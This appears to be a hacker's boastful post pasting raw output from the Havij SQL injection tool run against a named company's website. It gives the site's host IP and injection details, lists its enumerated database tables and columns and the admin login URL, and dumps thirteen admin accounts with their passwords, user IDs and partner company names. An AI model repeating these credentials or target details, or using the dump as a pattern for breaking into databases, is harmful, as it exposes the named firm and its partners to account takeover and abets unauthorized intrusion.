I USED HAVIJ WITH THIS ONE HAHAHA ! Website: http://www.phistek.com/ Host IP: 122.147.44.176 Web Server: Apache Powered-by: PleskLin Keyword Found: Apr-25-2012 Injection type is String (') DB Server: MySQL >=5 Selected Column Count is 11 Valid String Column is 3 Current DB: phistek Count(table_name) of information_schema.tables where table_schema=0x7068697374656B is 13 Tables found: admin,contact,document,download,download_name,faqs,faqtype,footer_pic,news,prod_mclass,prod_spec,prod_specdata,product Count(column_name) of information_schema.columns where table_schema=0x7068697374656B and table_name=0x61646D696E is 9 Columns found: serno,type,uid,passwd,name,logintime,lastlogin,bdate,DelFlag Count(column_name) of information_schema.columns where table_schema=0x7068697374656B and table_name=0x646F63756D656E74 is 8 Columns found: serno,name,desc,content,order,showup,bdate,DelFlag ADMIN PANEL : http://www.phistek.com/login.php Count(*) of phistek.admin is 13 Data Found: passwd,name,uid,serno=29448282^jill^jill^3 Data Found: passwd,name,uid,serno=E7805556^ServicePlus^2RUS01^4 Data Found: passwd,name,uid,serno=A2892177^Userful^4CAU01^5 Data Found: passwd,name,uid,serno=A8484775^POS Square^3SGP01^6 Data Found: passwd,name,uid,serno=E5705615^Macroservice^2ESM01^7 Data Found: passwd,name,uid,serno=53414818^???^admin^1 Data Found: passwd,name,uid,serno=E0573403^Display Solution^2DED01^8 Data Found: passwd,name,uid,serno=E0635160^Partner Tech^2DEP01^9 Data Found: passwd,name,uid,serno=E8530101^Perimatic^2FRP01^10 Data Found: passwd,name,uid,serno=E0910334^MUZYbar^2ESM02^11 Data Found: passwd,name,uid,serno=E5830594^AP esse^2ITA01^12 Data Found: passwd,name,uid,serno=E7608515^Aghigh^3IRA01^13 Data Found: passwd,name,uid,serno=A5301613^ESS^3THE01^14 ~xW3s13y